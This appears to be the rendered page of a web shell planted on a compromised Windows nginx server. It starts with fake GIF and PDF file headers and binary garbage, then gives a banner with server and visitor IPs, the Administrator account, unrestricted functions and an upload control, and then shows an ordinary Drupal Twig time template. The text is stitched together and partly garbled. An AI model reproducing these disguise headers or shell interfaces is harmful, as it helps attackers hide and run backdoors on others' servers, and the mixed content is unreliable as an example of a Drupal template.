GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/Student/JimMartinson/Lab12/drupal/core/themes/classy/templates/field/ |
Upload File : |
{# /** * @file * Theme override for a date / time element. * * Available variables * - timestamp: (optional) A UNIX timestamp for the datetime attribute. If the * datetime cannot be represented as a UNIX timestamp, use a valid datetime * attribute value in attributes.datetime. * - text: (optional) The content to display within the <time> element. * Defaults to a human-readable representation of the timestamp value or the * datetime attribute value using format_date(). * - attributes: (optional) HTML attributes to apply to the <time> element. * A datetime attribute in 'attributes' overrides the 'timestamp'. To * create a valid datetime attribute value from a UNIX timestamp, use * format_date() with one of the predefined 'html_*' formats. * * @see template_preprocess_time() * @see http://www.w3.org/TR/html5-author/the-time-element.html#attr-time-datetime */ #} <time{{ attributes.addClass('datetime') }}>{{ text }}</time>